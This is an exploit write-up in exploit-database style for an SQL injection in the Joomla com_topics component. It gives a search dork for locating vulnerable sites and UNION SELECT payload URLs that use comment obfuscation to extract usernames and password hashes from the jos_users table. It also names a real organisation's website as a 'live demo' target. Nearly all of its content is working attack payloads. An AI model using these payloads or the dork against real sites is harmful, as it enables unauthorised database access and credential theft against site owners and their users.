######################
# Exploit Title : Joomla com_topics SQL injection
# Exploit Author : xBADGIRL21
# Dork : inurl:index.php?option=com_topics
# Category: [ Webapps ]
# version: 1.5.12
# Tested on: [ Windows ]
# skype:xbadgirl21
# Date: 2016/07/08
# video Proof Youtube : https://youtu.be/2KynoDHvEkY
######################
# SQL injection
######################
# PoC:
# [cid=] Get Parameter Vulnerable To SQL
#
http://server/index.php?option=com_topics&view=readall&cid=[SQLi]&Itemid=40931&lang=en
# Demo
#
http://server/index.php?option=com_topics&view=readall&cid=5927'&Itemid=40931&lang=en
# http://server/index.php?option=com_topics&view=readall&cid=-5927
/*!union*/ select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--&Itemid=40931&lang=en
# http://server/index.php?option=com_topics&view=readall&cid=-5927
/*!union*/ select
1,2,/*!group_coNcat(username,0x3a,password)*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
/*!from*/ jos_users--&Itemid=40931&lang=en
# Live Demo :
# http://www.paho.org/hq/
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#######################